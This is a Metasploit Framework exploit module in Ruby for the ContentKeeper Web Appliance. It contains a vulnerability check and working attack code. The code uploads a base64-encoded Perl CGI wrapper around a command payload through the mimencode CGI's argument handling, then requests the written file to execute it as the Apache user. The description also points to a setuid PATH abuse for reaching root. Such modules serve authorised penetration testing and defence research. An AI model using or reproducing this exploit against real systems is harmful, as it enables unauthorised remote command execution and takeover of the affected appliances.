metasploit-framework/modules/exploits/unix/http/contentkeeperweb_mimencode.rb

103 lines
2.4 KiB
Ruby

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'ContentKeeper Web Remote Command Execution',
'Description' => %q{
This module exploits the ContentKeeper Web Appliance. Versions prior
to 125.10 are affected. This module exploits a combination of weaknesses
to enable remote command execution as the Apache user. Following exploitation
it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool'
to escalate to root.
},
'Author' => [ 'patrick' ],
'Arch' => [ ARCH_CMD ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '54551'],
[ 'OSVDB', '54552'],
[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
},
'Platform' => ['unix'],
'Targets' =>
[
[ 'Automatic', { } ]
],
'DisclosureDate' => 'Feb 25 2009',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
],self.class)
end
def check
connect
sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")
banner = sock.get(-1,3)
disconnect
if (banner =~ /500 Internal/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
exp = "#!/usr/bin/perl\n"
exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"
exp << "system(\""
exp << payload.encoded.gsub('"', '\"')
exp << "\");\n"
body = Rex::Text.encode_base64(exp)
connect
sploit = "POST /cgi-bin/ck/mimencode?-u+-o+bak.txt HTTP/1.1\r\n"
sploit << "Host: #{datastore['RHOST']}\r\n"
sploit << "Content-Length: #{body.length}\r\n\r\n"
print_status("Uploading payload to target.")
sock.put(sploit + body + "\r\n\r\n")
disconnect
sleep(5)
print_status("Calling payload...")
connect
req = "GET /cgi-bin/ck/bak.txt HTTP/1.1\r\n" # bak.txt is owned by apache, chmod 777 :) rwx
req << "Host: #{datastore['RHOST']}\r\n"
sock.put(req + "\r\n\r\n")
handler
disconnect
end
end